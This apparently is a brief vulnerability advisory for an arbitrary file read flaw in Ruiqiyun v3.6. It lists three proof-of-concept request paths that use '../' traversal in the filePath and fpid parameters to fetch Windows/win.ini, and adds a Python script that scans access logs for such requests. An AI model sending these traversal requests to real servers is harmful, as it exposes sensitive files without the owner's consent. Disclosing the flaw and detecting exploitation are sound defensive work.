Ruiqiyun xiazai Arbitrary File Reading Vulnerability
Vulnerability Description
The xiazai interface has an arbitrary file read vulnerability. An attacker can use it to obtain sensitive files from the server.
Vulnerability Impact
Ruiqiyun v3.6
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
/dwr/hret/fileTree?filePath=../
/dwr/srecy/xiazai?filePath=../../../../../../../../../../../Windows/win.ini
/dwr/hret/downfile?fpid=../../../../../../../../../Windows/win.ini
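To check whether these requests have already reached a server, the following added example (not part of the original post) scans web access logs for the three endpoints above with a `..` path segment in `filePath` or `fpid`. It goes beyond the literal PoC strings by also catching percent-encoded and backslash variants; the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoints and parameter names taken from the PoC requests on this page.
WATCHED = {
    "/dwr/hret/filetree": "filepath",
    "/dwr/srecy/xiazai": "filepath",
    "/dwr/hret/downfile": "fpid",
}

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dwr/srecy/xiazai?filePath=../../../Windows/win.ini HTTP/1.1" 200 92',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /dwr/hret/downfile?fpid=%252e%252e%255cWindows%255cwin.ini HTTP/1.1" 200 92',
    '192.0.2.11 - - [01/Jan/2024:10:00:02 +0000] "GET /dwr/hret/downfile?fpid=1042 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:03 +0000] "GET /index.jsp?filePath=../ HTTP/1.1" 404 0',
]

def has_traversal(value):
    """True if value contains a '..' path segment after repeated decoding."""
    for _ in range(3):  # undo up to three extra layers of percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Split on both separators so Windows-style '..\\' is caught as well.
    return ".." in re.split(r"[\\/]+", value)

def find_traversal_requests(log_lines):
    """Return (line_number, path, param, value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        param = WATCHED.get(url.path.lower())
        if param is None:
            continue  # not one of the endpoints named in the advisory
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == param and has_traversal(value):
                hits.append((number, url.path, key, value))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print("suspicious request on log line %d: %s %s=%s" % hit)
```

A hit with a 200 response and a non-trivial body size suggests the file was actually returned and should be treated as a disclosure of that file.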
This post is licensed under CC BY 4.0 by the author.